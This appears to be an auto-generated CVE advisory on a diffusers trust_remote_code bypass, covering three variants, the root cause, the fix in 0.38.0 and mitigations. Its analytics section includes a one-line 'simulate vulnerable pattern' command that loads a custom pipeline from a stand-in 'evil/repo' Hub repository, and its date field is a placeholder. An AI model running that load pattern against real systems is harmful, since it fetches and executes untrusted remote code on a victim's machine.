Listen to this Post
How the mentioned CVE works:
The vulnerability is a trust_remote_code bypass in Hugging Face’s `diffusers` library. Normally, `DiffusionPipeline.from_pretrained(…, trust_remote_code=False)` prevents loading remote Python files. However, the check was implemented inside `DiffusionPipeline.download()` instead of at the dynamic module load point. Any code path that bypasses `download()` also bypasses the security check. Three variants exist:
1. Cross‑repo custom pipeline: Calling `from_pretrained(‘repoA’, custom_pipeline=’attacker/repoB’, trust_remote_code=False)` evaluates the gate against repoA‘s file list, not repoB. Attacker’s `pipeline.py` from `repoB` executes.
2. Local snapshot + Hub custom pipeline: `from_pretrained(‘/local/snapshot’, custom_pipeline=’attacker/repoB’, trust_remote_code=False)` – the local path branch never calls download(), so the gate is never reached. Remote code from `repoB` runs.
3. Local snapshot with custom components: `from_pretrained(‘/local/snapshot’, trust_remote_code=False)` where the snapshot contains custom `.py` files (e.g., unet/my_unet_model.py) referenced in model_index.json. Again, `download()` is skipped and local custom code executes.
Root cause: The `trust_remote_code` gate was placed in the wrong function. All three variants lead to silent arbitrary remote code execution on the victim’s machine. Fixed in diffusers 0.38.0 by moving the gate into `get_cached_module_file` in dynamic_modules_utils.py, the actual choke point for every dynamic module load.
dailycve form:
Platform: Python diffusers
Version: < 0.38.0
Vulnerability: trust_remote_code bypass
Severity: Critical
date: 2024-10-XX
Prediction: Patch already available
Analytics under What Undercode Say:
Check installed diffusers version
pip show diffusers | grep Version
List all dynamic module load points (vulnerable before 0.38.0)
grep -r "get_cached_module_file" $(python -c "import diffusers, os; print(os.path.dirname(diffusers.<strong>file</strong>))") 2>/dev/null
Simulate vulnerable pattern (do not run on production)
python -c "from diffusers import DiffusionPipeline; DiffusionPipeline.from_pretrained('/tmp/fake', custom_pipeline='evil/repo', trust_remote_code=False)"
How Exploit:
Attacker hosts a Hub repo (e.g., attacker/repoB) containing a malicious pipeline.py. Victim runs DiffusionPipeline.from_pretrained('trusted/repoA', custom_pipeline='attacker/repoB', trust_remote_code=False). The `trust_remote_code` check only validates trusted/repoA, not attacker/repoB. `repoB/pipeline.py` is downloaded and executed, giving the attacker remote code execution on the victim’s machine. Similarly, using a local snapshot (e.g., /local/snapshot) with `custom_pipeline` or custom component `.py` files also bypasses the gate.
Protection from this CVE:
Upgrade to diffusers >= 0.38.0: pip install --upgrade "diffusers>=0.38.0". If upgrade is impossible, only load pipelines from fully trusted sources; never pass `custom_pipeline` pointing to a Hub repo different from the main pretrained_model_name_or_path; inspect local snapshots for unexpected `.py` files before loading. Note these are only mitigations – the only complete fix is upgrading.
Impact:
Silent arbitrary remote code execution on any machine that calls `DiffusionPipeline.from_pretrained` with custom pipelines (or local snapshots containing custom components). Attackers can compromise models, steal data, install backdoors, or pivot to internal networks. All users of `diffusers` versions below 0.38.0 are affected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
